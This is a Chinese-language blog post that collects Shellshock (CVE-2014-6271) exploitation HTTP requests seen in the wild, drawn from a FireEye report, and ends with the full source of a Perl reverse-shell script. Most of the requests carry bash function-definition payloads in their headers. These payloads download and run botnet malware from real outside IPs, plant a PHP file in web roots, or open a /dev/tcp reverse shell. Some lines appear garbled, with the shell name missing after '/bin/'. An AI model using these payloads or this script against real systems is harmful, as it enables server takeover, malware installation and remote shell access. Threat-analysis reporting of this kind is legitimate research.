破壳漏洞利用payload—shellshock in the wild
FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild
原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshock in the wild, 包括反弹shell、植入后门、信息窃取等行为如何实现。笔者从原文中摘出了对应利用方式的HTTP报文,感兴趣的朋友可以看原文获取较详细的分析,也可以自己试着分析一下。笔者从Bash漏洞曝光以来,对其进行了数日的跟踪,对CVE-2014-6271破壳漏洞的跟踪
Reverse Shell Perl Script:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
User-Agent: () { :;}; /bin/ -c “/usr/bin/wget http://singlesaints[.]com/firefile/temp?h=<domain> -O /tmp/a.pl”
Host: <domain>
Accept: */*
Tsunami/Kaiten, an IRC-based DDoS Client/Backdoor:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/-shellshock-scan-of-internet.html)
Accept: */*
Cookie: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
UDP Flood:
GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*
Cookie: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Host: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php Referer: () { :; }; wget 37.187.225.119/conf.txt > /var/ www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Perl.Shellbot, another IRC-based DDoS Client/Backdoor:
GET / HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: () { :;}; /bin/ -c ‘ -i >& /dev/tcp/195.225.34.101/3333 0>&1′
Host: <domain>
Connection: Close
Another Perl.Shellbot Variant:
GET /cgi-bin/hello HTTP/1.0
User-Agent: () { :;}; /bin/ -c “cd /tmp; wget http://dl.directxex[.]net/dl/nice.png; chmod +x *; perl nice.png” Host: <domain>
Tiny Reverse Shell ELF Executable:
GET /cgi-bin/ICuGI/EST/blast_detail.cgi%3FID%3DPU056535%26db%3DGenBank%26organism%3Dcucurbita_pepo HTTP/1.1
Host: <domain>
content-length: 0
accept-encoding: gzip, deflate
referrer: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:9199/v64 /tmp/.osock; /usr/bin/curl http://82.118.242.223:9199/v64 -o /tmp/.osock; else /usr/bin/wget 82.118.242.223:9199/v -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:9199/v /tmp/.osock; /usr/bin/curl http://82.118.242[.]223:91 99/v -o /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock”
accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
cookie: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:919
对于前文提到的第一个Perl的反弹脚本,其源码地址为:http://ww7.microtek.com.tw/Uploads/test/ttyClient.pl
#!/usr/bin/perl -w use IO::Socket; use Fcntl; # IOCTLs $TIOCGPTN = -2147199952; $TIOCSPTLCK = 1074025521; $EAGAIN=11; print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n"; $HOST=$ARGV[0]; $PORT=$ARGV[1]; $0="apache"; print "Connecting to $HOST:$PORT... "; $sock = new IO::Socket::INET ( PeerAddr => $HOST, PeerPort => $PORT, Proto => 'tcp', Blocking => 0, ) or die $!; print "ok\nAllocatig pseudo terminal... "; ## ptsname sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!; $tmp=''; ioctl (PTMX, $TIOCGPTN, $tmp) or die $!; $pts = unpack('i', $tmp); print "/dev/pts/$pts\nInitializing pseudo terminal... "; ## grantpt not needed on devpts ## unlockpt $unlock=pack('i', 0); ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!; ## prepare daemonizing chdir '/' or die $!; open STDIN, '/dev/null' or die $!; umask 0; print "ok\nForking shell thread..."; defined($pid = fork) or die $!; exit if $pid; defined($pid = fork) or die $!; if (!$pid) { exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or die $!; exit; } print "ok\nHave fun!\n"; open STDOUT, '>>/dev/null' or die $!; open STDERR, '>>/dev/null' or die $!; $pp = PTMX; $rin=$win=$ein=''; vec($rin,fileno($pp),1) =1; vec($rin,fileno($sock),1) = 1; select $sock; $|=1; select PTMX; $|=1; select STDOUT; $|=1; $finished=0; sub forwarddata { my ($from,$to) = @_; while(1) { $rv = sysread($from, $buff, 1024); last if (!defined($rv) && $! == $EAGAIN); defined($rv) or die $!; if ($rv == 0) { $finished = 1; last;} while(length $buff > 0) { $rv = syswrite($to, $buff, length $buff); if (!defined($rv) && $! == $EAGAIN) { ## try again next; } defined($rv) or die $!; last if ($rv == length $buff); substr($buff,0,$rv) = ''; } } } while(! $finished) { $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef); die $! if ($nfound == -1); forwarddata($pp,$sock); last if $finished; forwarddata($sock,$pp); last if $finished; } close PTMX; close $sock; $wout=$eout.$wout.$rout;